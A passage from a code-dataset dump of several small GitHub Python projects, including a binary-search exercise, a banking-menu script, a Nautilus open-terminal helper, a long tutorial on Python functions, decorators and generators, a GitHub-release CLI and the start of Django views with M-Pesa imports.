low\n    else:\n        mid = (high + low) // 2\n        if elem_needed < arr[mid]:\n            high = mid - 1\n            return binary_search_less_strictly(arr, elem_needed, low, high)\n        elif elem_needed > arr[mid]:\n            low = mid + 1\n            return binary_search_less_strictly(arr, elem_needed, low, high)\n        else:\n            counter = 0\n            for i in range(0, 
mid - low + 1):\n                if arr[mid - i] == elem_needed:\n                    counter += 1\n                else:\n                    break\n            return mid + 1 - counter\n\n\nsegments, points = map(int, input().split())\na_ends = [0] * segments\nb_ends = [0] * segments\nfor segment in range(segments):\n    a_ends[segment], b_ends[segment] = map(int, input().split())\n\na_ends_sorted = sorted(a_ends)\nb_ends_sorted = sorted(b_ends)\n\npoints_arr = sys.stdin.read().split()\npoints_n_segments = []\n\nfor i in range(points):\n    c = int(points_arr[i])\n    len_a = binary_search_less(a_ends_sorted, c, 0, segments - 1)\n    len_b = binary_search_less_strictly(b_ends_sorted, c, 0, segments - 1)\n    points_n_segments.append(len_a - len_b)\n\nprint(*points_n_segments)\n","repo_name":"Egor-Sidorov/Algorithmic_tasks","sub_path":"Quick_Sort.py","file_name":"Quick_Sort.py","file_ext":"py","file_size_in_byte":3891,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27175300571","text":"# Challenge: Building a banking system\n\n\"\"\" Overall goal\n    Build a banking system with the operations: withdraw, deposit\n    and view the statement. \"\"\"\n\nprint(\"Welcome to Banco ABC\")\n\nmenu = \"\"\"\n=====|Choose an option:|===\n\n[d] Deposit\n[s] Withdraw\n[e] Statement\n[q] Quit\n=> \"\"\"\n\nsaldo = 0\nlimite = 500\nextrato = \"\"\nnumero_saques = 0\nLIMITE_SAQUES = 3\n\n\nwhile True:\n\n    opcao = input(menu)\n\n    if opcao == \"d\":\n\n        deposito = float(input(\"Enter the amount to deposit:\"))\n\n        if deposito > 0:\n            saldo = saldo + deposito\n            extrato = extrato + \" \\nDeposit: R$ {:.2f}\".format(deposito)\n        \n\n    if opcao == \"s\":\n\n        if numero_saques >= LIMITE_SAQUES:\n            print(\"Daily withdrawal limit reached, please try again tomorrow\")\n\n        else:\n            saque = float(input(\"Enter the amount to withdraw:\"))\n\n            numero_saques = numero_saques + 1\n\n            if saque <= limite:\n                if saque <= saldo:\n                    saldo = saldo - saque\n                    extrato= extrato + \" \\nWithdrawal: R$ {:.2f}\".format(saque)\n\n                else:\n                    print(\"Insufficient funds, your current balance is {:.2f}\".format(saldo))\n            \n            else:\n                print(\"Withdrawal limit exceeded, please try an amount below R$ {}\".format(limite))\n\n    if opcao == \"e\":\n        print(\"==\"*5,\"statement\",\"==\"*5)\n        print(extrato)\n        print(\"\\nCurrent balance: R$ {:.2f}\".format(saldo))\n        print(\"==\"*12)\n\n    if opcao == \"q\":\n        print(\"Thank you, come back soon!\")\n        break\n    \n    elif opcao != \"d\" and opcao != \"s\" and opcao != \"e\" and opcao != \"q\":\n        print(\"Invalid operation, please choose one of the options again\")\n    \n\n","repo_name":"ijovanycecilio/Projects_Python","sub_path":"Banking_system.py","file_name":"Banking_system.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"45888463194","text":"#!/usr/bin/env python\nimport os\nimport logging\n\n#logging.basicConfig(level=logging.DEBUG, filename=\"logs.data\", filemode=\"w\")\n#logger = logging.getLogger(__name__)\n\ndef parse_nautilus_environment():\n    result = {\n        'NAUTILUS_SCRIPT_SELECTED_FILE_PATHS' : [],\n        'NAUTILUS_SCRIPT_SELECTED_URIS' : [],\n        'NAUTILUS_SCRIPT_CURRENT_URI' : [],\n        'NAUTILUS_SCRIPT_WINDOW_GEOMETRY' : []\n    }\n    for i in result.keys():\n        if i in os.environ:  # was os.environ.has_key(i), which is Python 2 only\n            result[i] = os.environ[i].split(':')\n        else:\n            result[i] = []\n    return result\n\ndef open_terminal(result):\n\tpath = result['NAUTILUS_SCRIPT_CURRENT_URI'][1][2:]\n\tpath = path.replace(\"%20\", \" \")\n\t#logger.debug(path)\n
\t#os.system(\"zenity --info --text '%s'\"%path)\n\tos.system(\"/usr/bin/gnome-terminal --working-directory='%s'\" %path)\n\nopen_terminal(parse_nautilus_environment())\n","repo_name":"vishvendra01/UtilityScripts","sub_path":"open_terminal.py","file_name":"open_terminal.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"44215202492","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ## What is a Function?\n# \n# If a group of lines is required frequently, it is not advisable to write them out separately each time. Such statements should be defined once as a single unit, which we can then call as many times as needed without rewriting them. This unit is called a function. \n# \n# Functions are also called methods, procedures, or subroutines\n\n# ## Advantage\n# Code reuse. \n# \n\n# # Types of functions\n# 1. Built-in functions \n# 2. User-defined functions\n# \n\n# # Built in Functions\n# Built-in functions, or pre-defined functions, are functions that ship with Python itself.\n# \n# For instance, print(), max(), pow(), input() etc.\n# \n# In Python 3, there are 68 built-in functions\n\n# # User defined functions \n# User-defined functions are functions written explicitly by programmers to meet their own requirements\n\n# In[51]:\n\n\n#Syntax to create user defined functions\n\"\"\" \ndef function_name(parameters) : \n    ---- ----- \n    ---- -----\n    return value(s) # Optional\n\"\"\"\n\n\n# In[4]:\n\n\n\"\"\"Write a function to print \"Humanity Above All\" \"\"\"\n# Function definition\ndef myFunction(): \n    print(\"Humanity Above All\") \n\n#myFunction()\n\n# Function call\nfor _ in range(5):\n    myFunction()\n\n\n# # Parameters\n# Parameters are the function's inputs. If a function has parameters, we must supply values when invoking it; otherwise, we will get an error.\n\n# In[5]:\n\n\n\"\"\" Function Example 1\"\"\"\ndef myFunction(name): # \"name\" is the formal parameter\n    print(\"Hi!\",name,\" How are you?\") \n    # Default return value is None\n    \nmyFunction(\"Kapil\") # \"Kapil\" is the actual parameter; this is a function call\nmyFunction(\"Rani\")\n\n\n# In[8]:\n\n\n\"\"\" Function Example 2\"\"\"\ndef myFunction(x): # 'x' is the formal parameter\n    print(\"Square of the\",x,\"is: \", x**2) \n    # Default return value is None\n    \nmyFunction(5) # 5 is the actual parameter\nmyFunction(19)\n\n\n# In[14]:\n\n\n\"\"\" Function Example 3: defining and passing two parameters\"\"\"\ndef addSquare(x,y): # x and y are the formal parameters\n    return x**2 + y**2\n\n# Case 1\nprint(\"Case1: The result is: \",addSquare(5,5)) # Function call\n\n#Case 2\nz = addSquare(2,9)\nprint(\"Case2: The result is: \",z) # Function call\n\n\n# In[9]:\n\n\n\"\"\" Function Example 4 (returning a variable)\"\"\"\ndef addSquare(x,y): \n    w = x**2 + y**2\n    return w # Return a variable\n\nprint(\"Case 1 result: \",addSquare(2,3)) # Case 1\n\nz = addSquare(6,3) #Case 2\nprint(\"Case 2 result: \",z)\n\n\n# In[11]:\n\n\n\"\"\"Example 5: Returning more than one value\"\"\"\ndef add_sub_mul_Function(x, y): \n    mySum = x + y\n    mySub = x - y \n    myMul = x*y \n    return mySum, mySub, myMul # Return more than one value\n\naSum, bSub, cMul = add_sub_mul_Function(9, 3) \n# Receive more than one returned value\n\nprint(\"The Sum is :\", aSum) \nprint(\"The Subtraction is :\", bSub)\nprint(\"The multiplication is: \",cMul) \n\n\n# # Types of actual parameters\n# 1. positional \n# 2. keyword \n# 3. default \n# 4. variable length\n\n# # 1. 
Positional parameters\n# Correct positional order must be maintained\n\n# In[14]:\n\n\n\"\"\" 1. Positional parameters\"\"\"\ndef positionalFunction(x,y): # Normal argument: matched by position\n    print(x,\" to the power\", y, \"is: \",x**y)\n\npositionalFunction(2, 3)\npositionalFunction(3, 2)\n\n\n# # Notes on Positional parameters\n# 1. The number of parameters and the position of each parameter must match. \n# 2. If the order of the parameters is changed, the outcome may change.\n# 3. We will get an error if we vary the number of parameters.\n\n# In[17]:\n\n\n\"\"\"Positional parameters\"\"\"\ndef positionalFunction(x,y): \n    print(x,\" to the power\", y, \"is: \",x**y)\n\npositionalFunction(2, 3)\n#positionalFunction(2, 3, 5)\n\n\n# # Keyword Parameters\n# We can pass parameter values by keyword, i.e., by the parameter's name. The order of the parameters does not matter, but the number of parameters must be equal.\n\n# In[20]:\n\n\n\"\"\"keyword Parameters\"\"\"\ndef keywordFunction(x,y): \n    print(x,\" to the power\", y, \"is: \",x**y)\n\nkeywordFunction(x = 2, y = 3) #Keyword parameters: matched by name\n#keywordFunction (y = 3, x = 2)\n#keywordFunction (y = 3, x = 2, z = 1)\n\n\n# Both positional and keyword parameters can be used at the same time. \n# However, we must put positional parameters first, followed by keyword parameters, else we will get a syntax error.\n# \n\n# In[23]:\n\n\ndef pkFunction(x,y):\n    print(x,\" to the power\", y, \"is: \",x**y)\n\npkFunction(2, 3)\npkFunction(2, y = 3)\n#positionalFunction(x = 2, 3)\n\n\n# # Default Parameters\n# For our positional parameters, we can sometimes assign default values.\n\n# In[29]:\n\n\n\"\"\"Default Parameters\"\"\"\n\ndef defaultPFunction(x = 3, y = 2):\n    print(x,\" to the power\", y, \"is: \",x**y)\n\ndefaultPFunction() # 3^2\ndefaultPFunction(2) # 2^2\ndefaultPFunction(2, 3) # 2^3\ndefaultPFunction(2, y = 3) # 2^3\n#defaultPFunction(x = 2, y = 3) # 2^3\n#defaultPFunction(y = 3, 5)\n\n\n# # Variable length parameters\n# 1. With variable length parameters, we may pass a variable number of arguments. \n# 2. The * symbol can be used to define a variable length parameter.\n\n# In[36]:\n\n\n\"\"\"Example of variable length parameters\"\"\"\ndef variablePF(*N): \n    mulv = 1\n    print(\"The received value: \",N)\n    print(\"Number of received parameters: \", len(N))\n    for n in N: \n        mulv *= n \n    \n    print(\"The multiplication value is: \",mulv) \n    \n#variablePF() # No parameter\n#variablePF(10) \nvariablePF(4,3) \n#variablePF(range(10)) \n\n\n# # Mixing variable length parameters with positional parameters.\n\n# In[42]:\n\n\n\"\"\" Example 1: Mixing variable length param. with positional param\"\"\"\ndef variablePF(data, *N): \n    mulv = data\n    print(\"data is: \",data,\", N is: \", N)\n    \n    for n in N: \n        mulv *= n \n\n    print(\"The multiplication value is: \",mulv) \n\n#variablePF (2) \n#variablePF (3, 4) \nvariablePF (3, 4, 5, 8, 9, 10) \n#variablePF (2, 4, data = 5) \n#variablePF (data = 2, 4, 5)\n\n\n# In[47]:\n\n\n\"\"\" Example 2: Mixing variable length param. 
with a default-value param\"\"\"\ndef variablePF(*N, data = 1): \n    mulv = data\n    print(\"data is: \",data,\", N is: \", N)\n    for n in N: \n        mulv *= n \n\n    print(\"The multiplication value is: \",mulv) \n\n#variablePF (2) # Default value of data is 1, N is: (2,)\n#variablePF (3, 4) # Default value of data is 1, N is: (3,4)\n#variablePF (2, 4, 5) # Default value of data is 1, N is: (2, 4, 5) \nvariablePF (2, 4, data = 5) # Here the value of data is 5, N is: (2, 4)\n#variablePF (data = 5, 4, 5, 7)\n\n\n# # Keyword variable length parameters\n# Use **. Internally these keyword arguments are stored in a dictionary.\n\n# In[52]:\n\n\n\"\"\" Keyword variable length parameters\"\"\"\ndef vlkParameters(**kwargs):\n    for key, value in kwargs.items(): \n        print(key, \":\", value)\n\n#vlkParameters(PI = 3.14)\n#vlkParameters(Name = \"Kapil\", Address = \"Chandigarh\") \nvlkParameters(a=1,b=9,c=7)\n\n\n# In[54]:\n\n\n# use positional, *args and **kwargs together\ndef examplePAK(a, b, *args, **kwargs):\n    print(\"The values of positional parameters are: \",a,\",\",b)\n    sum =0\n    for i in args:\n        sum +=i\n    print(\"The sum of variable length parameters is: \",sum)\n    \n    #print(kwargs)\n    for j in kwargs.items():\n        print(\"The keyword values are: \",j)\n    \n#examplePAK(2,3, 10, 11, 12, x = \"Great\", y = \"Goal\") # Function call\nexamplePAK(7,9, 10, 11, 12, 15, 17, x = \"God\", y = \"is\", z = \"Great\") # Function call\n\n\n# # Difference between Function, Module, Library\n# 1. A set of statements saved under a name is called a function. \n# 2. A module consists of a set of functions. \n# 3. A library consists of a set of modules.\n\n# # Types of variables\n# 1. Global Variables\n# 2. Local Variables\n\n# # Global Variables \n# Global variables are variables that are defined outside of a \n# function. All functions in that module can access these variables\n\n# In[57]:\n\n\n\"\"\"Example of a global variable\"\"\"\nPI = 3.14\ndef globalVFunction1():\n    print(\"The value of PI in F1\",PI)\n\ndef globalVFunction2():\n    print(\"The value of PI in F2\",PI)\n\nglobalVFunction1()\nglobalVFunction2()\n\n\n# Notes on local variables\n# 1. Local variables are variables that are declared within a function.\n# 2. These are only available in the function where they were \n# declared. \n# 3. 
We can't access them from outside the function.\n\n# In[58]:\n\n\n\"\"\"Example of local and global variables\"\"\"\nA = 10\ndef VFunction1():\n    A = 20\n    print(\"F1: Print local value: \",A)\n\ndef VFunction2():\n    print(\"F2: Print global value\",A)\n\nVFunction1() \nVFunction2()\n\n\n# In[61]:\n\n\n\"\"\" The global keyword\"\"\"\nA = 10\ndef VFunction1():\n    global A\n    A = 20\n    print(\"F1: Print local value: \",A)\n\ndef VFunction2():\n    print(\"F2: Print global value: \",A)\n\nVFunction1() \nVFunction2()\n\n\n# In[63]:\n\n\n\"\"\" Accessing a global variable shadowed by a local variable\"\"\"\nA = 50\ndef VFunction1():\n    A = 20 # Local variable\n    print(\"F1: Print local value: \",A) # Local value\n    print(\"F1: This is global value: \",globals()['A']) # bypasses the local variable\n\ndef VFunction2():\n    print(\"F2: Print global value: \",A)\n\nVFunction1() \nVFunction2()\n\n\n# In[65]:\n\n\nvar1 = 10\n\ndef localF():\n    var1 = 50\n    print(\"Print the local variable: \",var1)\n    \nprint(\"Print the global variable: \",var1)\nlocalF()\nprint(\"Print the global variable: \",var1)\n\n\n# In[67]:\n\n\nvar = 11\ndef myF():\n    global var # Declare global \n    var += 1\n    print(\"Print the variable: \",var)\n\nprint(\"Print the variable: \",var)\nvar +=1\nmyF()\n\n\n# In[68]:\n\n\nvar = 10 # module-level (global) variable\ndef myF1():\n    var = 13 # enclosing-scope variable, local to myF1\n\n    def myF2():\n        print(\"Inner enclosing value is printed: \",var) \n    # Print variables defined inside the parent function\n    myF2()\n    \nmyF1()\nprint(\"The global value is printed: \",var) \n\n\n# In[70]:\n\n\n# Examples: Is forward reference okay? \ndef myf1():\n    val = 30 \n    myf2(val) # Forward reference okay\n\ndef myf2(val):\n    print(\"The value is: \",val)\n\nmyf1()\n\n\n# # The nonlocal keyword \n# It's used to work with variables inside nested functions that shouldn't be local to the inner function.\n\n# In[83]:\n\n\ndata = 5\ndef myfunc1():\n    #global data\n    data = 10\n    print(\"Data1: \",data)\n    def myfunc2():\n        nonlocal data\n        #global data\n        data = 20\n        print(\"Data2: \",data)\n    myfunc2() \n    \n    print(\"Data3: \",data)\n    return data\n\nprint(\"Data4: \",myfunc1())\nprint(\"Data5:\",data)\n\n\n# In[84]:\n\n\ndata = 5\ndef myfunc1():\n    #global data\n    #nonlocal data\n    data = 10\n    print(\"Data1: \",data)\n    return data\nprint(\"Data2: \",myfunc1())\nprint(\"Data3:\",data)\n\n\n# In[1]:\n\n\ndef myfunc1():\n    data = 10\n    print(\"Data1: \",data)\n    def myfunc2():\n        #nonlocal data\n        data = 20\n        print(\"Data2: \",data)\n        def myfunc3():\n            nonlocal data\n            data = 30\n            print(\"Data3: \",data)\n        myfunc3()\n        print(\"Data5: \",data)\n    myfunc2() \n    print(\"Data6: \",data)\n    return data\n\nprint(\"Data7: \",myfunc1())\n\n\n# # Recursive function\n# A function that calls itself until it reaches a base case.\n\n# In[88]:\n\n\n\"\"\" Recursive function\"\"\"\ndef factorial(n):\n    if n == 0: \n        return 1\n    else: \n        return(n*factorial(n-1)) \n    \nprint(\"Factorial of 4 is :\",factorial(4))\nprint(\"Factorial of 5 is :\",factorial(5))\n\n\n# # Anonymous functions or lambda functions\n\n# Sometimes we declare a function without giving it a name; \n# these functions are known as anonymous functions or lambda functions.\n# * lambda Function: defined by \"lambda\" keyword\n# * lambda argument_list : expression\n# * Example: lambda x:x*x\n\n# In[86]:\n\n\n\"\"\"Example of lambda function (with a single parameter)\"\"\"\nmyF=lambda n:n*n \n\n#print(\"The Square of 4 is :\", myF (4))\nprint(\"The Square of 5 is :\", myF (5))\n#print(\"The Square of XX is :\", myF (4,5))\n\n\n# In[94]:\n\n\n\"\"\"Example of 
lambda function (with more than one parameter)\"\"\"\nmyF=lambda a,b: a**b \n\nprint(\" 2 to the power 4:\", myF (2,4))\nprint(\" 3 to the power 2:\", myF (3,2))\n#print(\" X to the power X:\", myF (3))\n\n\n# In[88]:\n\n\ndef myfunc():\n    x = 4\n    result = (lambda n: x ** n) # x is remembered \n    return result\n\n# myfunc is called once; the returned object is then used to call the lambda\nvalue = myfunc()\nprint(\"The output is: \",value(2)) # n = 2, input of lambda\n\n\n# In[94]:\n\n\ndef myFunction():\n    data = []\n    for i in range(10): # Use defaults instead\n        data.append(lambda x, i=i: i ** x) # Remember i\n    return data\nvalue = myFunction()\n#print(value)\nvalue[2](10) # i = 2, x = 10\n\n\n# # Notes on lambda function\n# 1. We may build very brief code with lambda functions. \n# 2. It improves the readability of the programme.\n# 3. No explicit return statement is required.\n# 4. Using a lambda function we can pass a function as an argument to another function. \n\n# In[95]:\n\n\n# More examples of lambda in a list\nmyList = [lambda x: x + 1, lambda x: x - 1, lambda x: x ** 0.5, lambda x: x**2] \nfor f in myList:\n    print(\"The values are: \",f(5))\n\nprint(\"The last result is: \",myList[2](5)) \n# 0: inc, 1: Dec, 2: SRoot, 3: Square\n\n\n# In[99]:\n\n\n# More examples of lambda in a dictionary\nmyList = {'Inc':(lambda x: x + 1), \n          'Dec':(lambda x: x - 1), \n          'SRoot': (lambda x: x ** 0.5)}\n\nfor f in myList:\n    print(\"The value of\", f, \"is: \",myList[f](4))\n\n#print(\"The last result is: \",myList[0](3)) \n# (keys are 'Inc', 'Dec', 'SRoot')\n\n\n# # Lambda with filter\n# The filter() function is used to filter values \n# (based on some condition) from the given sequence. \n# Syntax: filter(function,sequence)\n\n# In[100]:\n\n\n\"\"\"Lambda with filter\"\"\"\ndata = range(10) \nLFF1 = list(filter(lambda x:x%2==0,data)) # filter(function,sequence)\nLFF2 = list(filter(lambda x:x>=5,data))\n\nprint(\"Print even numbers: \",LFF1)\nprint(\"Values >= 5: \",LFF2)\n\n\n# # Lambda with map() function\n# For every item in the given sequence, apply some function and generate a new dataset with the required modification.\n# \n# syntax: map(function,sequence)\n# \n\n# In[98]:\n\n\n\"\"\"Lambda with map() function (Example 1)\"\"\"\ndata=range(5) \nX=list(map(lambda x:x**2,data)) \n\nprint(\"Square the value: \",X) \n\n\n# In[105]:\n\n\n\"\"\"Lambda with map() function (Example 2)\"\"\"\ndata1=range(5)\ndata2=range(6,10) \nX=list(map(lambda x,y:x**y,data1, data2)) \n\nprint(\"data1 to the power data2: \",X)\n\n\n# # Lambda with reduce() function\n# It reduces a sequence of elements to a single element by repeatedly applying a function.\n# \n# syntax: reduce(function,sequence)\n\n# In[107]:\n\n\nfrom functools import * \ndata=[2, 1, 4, 3] \nresult=reduce(lambda x,y:x+y,data) \nprint(\"The reduce result is: \",result) \n\n\n# # Function Aliasing\n# Renaming a function\n\n# In[112]:\n\n\ndef addMy(x,y): \n    print(\"Addition is:\",x+y) \n    \nsumMy=addMy\n\nprint(\"The id is: \",id(sumMy(2,6))) \nprint(\"The id is: \",id(addMy(4,5))) \n    \nsumMy(2,6)\n#del addMy\n#addMy(10, 12)\n#sumMy(10,6)\n\n\n# If we delete a function, we can still access it through its alias.\n# * Syntax to delete: del sumMy\n\n# # Nested Functions\n# Declaring a function inside another function\n\n# In[113]:\n\n\n\"\"\"Nested function example\"\"\"\n\ndef outerF(): \n    print(\"outer function initiated _1\") \n    \n    def innerF(): \n        print(\"Inside the inner function _3\") \n    \n    print(\"outer function called inner function _2\") \n    innerF() # 
Calling inside the outer Function\n\n#inner() # Calling outside the outer Function\nouterF()\n\n\n# # Functions are first-class objects\n# Everything in Python is an object. Functions are first-class objects: they can be referenced, assigned to variables, passed to other functions, and returned from functions.\n# \n# They can also be declared inside another function and supplied to another function as an argument.\n\n# # Passing a function as an argument to another function\n\n# In[114]:\n\n\n\"\"\"Example 1: Passing a function as an argument to another function\"\"\"\ndata=[1,2,3, 5, 6] \ndef mySquare(x):\n    return x**2\n\nresult=list(map(mySquare,data))\nprint(\"Passing a function:\",result)\n\n\n# In[115]:\n\n\n#Example 2: Functions can return another function\ndef OuterAdder(x):\n    print(\"The x value is:\",x)\n    def InnerAdder(y): # Inner function\n        print(\"The y value is:\",y)\n        return x+y\n    \n    return InnerAdder # Return InnerAdder itself, without calling it\n    \naddingValues = OuterAdder(5) # The x value is 5; assign the function object\n#print(\"\\nPrinting addingValues:\\n\",addingValues)\nfinalResult = addingValues(10) # The x value is 5, the y value is 10\nprint(\"The final result:\",finalResult)\nfinalResult = addingValues(13) # The x value is 5, the y value is 13\nprint(\"The final result:\",finalResult)\n\n\n# In[123]:\n\n\n#Example 3: Function returning another function\ndef outerF(num):\n    def even():\n        print(\"The\", num, \"is an even number\")\n\n    def odd():\n        print(\"The\", num, \"is an odd number\")\n\n    if num%2 == 0:\n        return even\n    else:\n        return odd\ntest = outerF(10) # Assign function object \ntest() # Call the function\n\ntest = outerF(13) \ntest()\n\n\n# In[124]:\n\n\n#Example 4: Function returning another function\ndef outer(x):\n    if x%2 == 0:\n        def inner1():\n            print(x,\"is an even number\")\n        return inner1\n    else:\n        def inner2():\n            print(x,\"is an odd number\")\n        return inner2\n    \nx = outer(10)\nx()\nx = outer(13)\nx()\nouter(11)()\n\n\n# # Closure or factory function\n# Depending on whom you ask, this sort of behavior is also sometimes called a closure or factory function. \n\n# In[73]:\n\n\ndef outer(x):\n    def inner(a): \n        return a ** x # retains x from the enclosing scope\n    return inner\n\nf1 = outer(2) # x = 2, a new instance of inner is created\nresult1 = f1(3) # a = 3, calling the inner function that outer returned \nprint(\"Result 1: \",result1) # 3^2 = 9\n\nf2 = outer(4) # x = 4, in this case x = 4\nresult2 = f2(3) # a = 3, \nprint(\"Result 2: \",result2) # 3^4 = 81\nprint(\"Each call to outer creates a new instance of inner, and each instance keeps a link to a different binding of x\")\n\n\n# # Decorator function\n# * A decorator takes a function as an argument and extends its functionality, returning a modified function with the enhanced behaviour.\n# * The fundamental goal of decorator functions is to let us extend the functionality of existing functions without having to change them.\n# * It allows programmers to change how a function behaves.\n# * In decorators, a function is passed as a parameter to another function and then called inside the wrapper function.\n# * It is also known as \"metaprogramming\": 
one part of a program modifies another part of the program at definition time.\n\n# # Higher Order Function\n# A function that accepts another function as an argument is called a \n# higher order function.\n# \n\n# In[45]:\n\n\n\"\"\"Example of a higher order function\"\"\"\ndef Inc(x): \n    return x+1 \ndef Dec(x): \n    return x-1\n\ndef operation(func, x): # func is a function, passed as a parameter \n    cal = func(x) \n    return cal \n\nprint(\"The incremented value: \",operation(Inc,10)) \nprint(\"The decremented value: \",operation(Dec,10)) \n\n\n# In[116]:\n\n\ndef divide(x,y): \n    print(\"The result is: \",x/y) \n    \ndef outerDiv(func): \n    def inner(x,y): \n        if y != 0: \n            return func(x,y) \n    return inner\n    \ndivideResult1 = outerDiv(divide) \ndivideResult1(2,4)\n\n\n# In[119]:\n\n\ndef outer_div(func): \n    def inner(x,y):\n        if y != 0: \n            return func(x,y)\n        else:\n            print(\"y should not be 0\")\n    return inner\n\n# decorators wrap a function, modifying its behavior.\n@outer_div \ndef divide(x,y): \n    print(\"The result is: \",x/y)\n\ndivide(2,4) \ndivide(6,2)\ndivide(5,0)\n\n# Can we wrap another function??\n\n\n# In[124]:\n\n\n# More than one decorator\ndef display(func):\n    def inner(x,y):\n        print(\"\\nThe value of x is\",x,\"& the value of y is\",y)\n        return func(x,y)\n    return inner\n    \ndef outer_div(func): \n    def inner(x,y):\n        if y != 0: \n            return func(x,y)\n        else:\n            print(\"y should not be zero!\") \n    return inner\n\n@outer_div\n@display\ndef divide(x,y): \n    print(\"The result is: \",x/y)\n\ndivide(2,4) \ndivide(6,2)\ndivide(5,0)\n\n\n# In[2]:\n\n\n# More than one decorator\ndef mul(func):\n    def inner(x,y):\n        print(\"\\nThe value of x is\",x,\"& the value of y is\",y)\n        print(\"Multiplication is: \", x*y)\n        return func(x,y)\n    return inner\n    \ndef div(func): \n    def inner(x,y):\n        if y != 0: \n            print(\"The division is: \",x/y)\n            return func(x,y)\n        else:\n            print(\"y should not be zero!\") \n    return inner\n\n@mul\n@div\ndef evaluate(x,y): \n    print(\"Evaluation is done!\")\n\nevaluate(2,4) \nevaluate(6,2)\nevaluate(5,0)\n\n\n# # Generator Function\n# It is similar to a normal function defined with the def keyword, but it uses the yield keyword instead of return. \n\n# In[45]:\n\n\n#Example 1\ndef myYield(): \n    str1 = \"First time\" \n    yield str1 \n    \n    str2 = \"Second time\" \n    yield str2 \n    \n    str3 = \"Third time\" \n    yield str3 \n    \nobj = myYield() \nprint(next(obj)) \nprint(next(obj)) \n#print(next(obj)) \n\n\n# In[48]:\n\n\n#Example 2\n#n=1\ndef myGen():\n    n = 1\n    n+=2\n    yield n\n    \n    n+=2\n    yield n \n    \n    n+=2\n    yield n\n    \noutput=myGen()\nprint(next(output))\nprint(next(output))\nprint(next(output))\n\n\n# # Loop with Generator Function\n\n# In[54]:\n\n\n# Example 3\ndef myGen(x):\n    for i in range(x):\n        yield i\n    \nmySeq = myGen(3) # x = 3 \nprint(next(mySeq))\nprint(next(mySeq))\nprint(next(mySeq))\n#print(next(mySeq))\n\n\n# # Handling the StopIteration error\n\n# In[55]:\n\n\n# Example 4, Handling the StopIteration error using try and except\ndef myGen(x):\n    for i in range(1,x):\n        yield i\n    \nmySeq = myGen(6) # x = 6 \n\nwhile True:\n    try:\n        print (\"Received on next(): \", next(mySeq))\n    except StopIteration:\n        break\n\n\n# In[5]:\n\n\n# Example 5, Handling the StopIteration error without try and except\ndef myFun1(x): \n    for i in range(0,5): \n        yield x**i \n\n    \nfor n in myFun1(2): # x = 2, 2^i\n    print(n) \n\n\n# # Difference between Generator function and Normal function\n# 1. 
A normal function contains a single return statement, whereas a generator function can contain one or more yield statements.\n# 2. Local variables and their state are remembered between successive calls.\n\n# In[60]:\n\n\n# Example 6: fibonacci using a generator function\ndef fibonacciGenerator():\n    n1=0; n2=1\n    while True:\n        yield n1\n        n1, n2 = n2, n1 + n2\n    \nfibSeq= fibonacciGenerator()\nprint(next(fibSeq))\nprint(next(fibSeq))\nprint(next(fibSeq))\nprint(next(fibSeq))\nprint(next(fibSeq))\n#print(next(fibSeq))\n#print(next(fibSeq))\n\n\n# # Generator Expression\n# * (x*x for x in range(n)) is a generator expression \n# * The first part of the expression is the yield value \n# * The second part is the for loop over the collection\n\n# In[63]:\n\n\n# Example 7: a generator expression produces its values lazily, one per next() call\nlist = [1,2,3,4] # (this name shadows the built-in list type)\n    \nz = (x**0.5 for x in list)\nprint(\"Output of generator function: \",next(z)) \nprint(\"Output of generator function: \",next(z))\nprint(\"Output of generator function: \",next(z))\n#print(x)\n\n\n# # List comprehension Vs Generator Expression\n\n# In[64]:\n\n\n[x**2 for x in range(5)] #List comprehension\n\n\n# In[66]:\n\n\nGE = (x**2 for x in range(5)) #Generator Expression\nnext(GE)\nnext(GE)\nnext(GE)\n\n\n# # Generate an Infinite Sequence\n\n# In[69]:\n\n\n# Example 8: Generate an Infinite Sequence\ndef iS(): \n    n = 0 \n    while True: \n        yield n \n        n += 1 \n    \n#for i in iS(): \n#    print(i) \n\n","repo_name":"TheAcademcian/Python","sub_path":"Function/Function.py","file_name":"Function.py","file_ext":"py","file_size_in_byte":23549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19650168136","text":"\"\"\"Command-line interface for github_release_fetcher.\"\"\"\nimport click\n\nfrom . 
import __version__, github\n\n\n@click.command()\n@click.option(\n    \"--owner\",\n    help=\"Organisation of the Github repository\",\n    required=True,\n)\n@click.option(\n    \"--repository\",\n    help=\"Github repository\",\n    required=True,\n)\n@click.version_option(version=__version__)\ndef main(owner: str, repository: str) -> None:\n    \"\"\"The Github releases fetcher tool.\"\"\"\n    data = github.latest_release(owner=owner, repository=repository)\n\n    version = data.tag_name\n\n    click.echo(\"Version: {}\".format(version))\n    click.echo(\"Assets:\")\n    for asset in data.assets:\n        click.echo(asset)\n","repo_name":"pziggo/github-release-fetcher","sub_path":"github_release_fetcher/console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38235136208","text":"import json\nfrom django.http.response import HttpResponseRedirect\nimport requests\nimport logging\nfrom os import sync\n\nfrom django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import get_object_or_404, render\nfrom django.template import context\nfrom recipeapp.forms.recipe import ReviewForm\nfrom django.core.mail import send_mail\nfrom recipeapp.models.models import LNmpesaOnline, Recipe, Review, UserProfile\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.decorators import api_view\n\nfrom recipeapp.views.mpesa_credentials import LipanaMpesaPpassword, MpesaAccessToken\n\ndef home(request):\n    \n    try:\n        query = request.GET.get('q') \n        recipes=Recipe.search(query)\n        print(query)\n        context={\n            'recipe':recipes,\n        }\n        \n    except:\n        if request.user.id:\n            \n            profile=UserProfile.objects.get(user_id=request.user.id)\n            phone=profile.PhoneNumber\n            phone=str(phone)\n            print(phone)\n            phone=phone[1:]\n            phone=str(phone)\n            pre='254'\n            phone=(pre+phone)\n            upgrade=LNmpesaOnline.objects.filter(PhoneNumber=profile.PhoneNumber,Amount=1.0)\n            recipe=Recipe.objects.all().order_by('created_at').reverse()\n            print(upgrade) \n            \n            context={\n                